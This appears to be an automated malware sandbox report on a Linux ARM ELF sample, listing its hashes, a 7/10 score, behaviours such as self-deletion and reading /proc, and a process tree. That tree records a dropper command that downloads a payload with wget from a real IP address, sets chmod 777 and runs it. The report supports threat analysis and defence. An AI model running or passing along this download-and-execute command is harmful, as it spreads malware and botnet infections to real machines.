Analysis
-
max time kernel
10s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20231222-en -
resource tags
-
submitted
13-02-2024 05:22
General
-
Target
ced0dd978b2bbc7c136dbc082de5f3cdff5cbdd7ac2716a9c78662c69ce1f9b7.elf
-
Size
32KB
-
MD5
c12790bd1ca8b388b494d3621452de2b
-
SHA1
7d6a17846e42cc75260f780fd583a199caa1cf7d
-
SHA256
ced0dd978b2bbc7c136dbc082de5f3cdff5cbdd7ac2716a9c78662c69ce1f9b7
-
SHA512
1d664bf292ac8af23ff71f9f43ac5020c895a9ea470f0e37cc413c4c5a4fdb5a10f1c7f41445673052d40fa47a00da4b23c31933e0d6e3979624a7d1df4f734d
-
SSDEEP
768:lVBPLYCsTHMI/1JOhC79q3UELLuoAL2jqoHWQb8L:xPLYCNINJ+LLu1L2v8L
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/ced0dd978b2bbc7c136dbc082de5f3cdff5cbdd7ac2716a9c78662c69ce1f9b7.elf/tmp/ced0dd978b2bbc7c136dbc082de5f3cdff5cbdd7ac2716a9c78662c69ce1f9b7.elf1⤵
- Deletes itself
- Reads runtime system information
-
/bin/sh/bin/sh -c "wget http://198.98.51.91/abdagoodamagalu/nk7; chmod 777 *; ./nk7 wget.echo.telnet.arm7"2⤵
-
/usr/bin/wgetwget http://198.98.51.91/abdagoodamagalu/nk73⤵
-
-
/bin/chmodchmod 777 systemd-private-f18f7714796d470bbaa6ebfcb429bc4b-systemd-timedated.service-IHRHII3⤵
-
-
/tmp/nk7./nk7 wget.echo.telnet.arm73⤵
-
-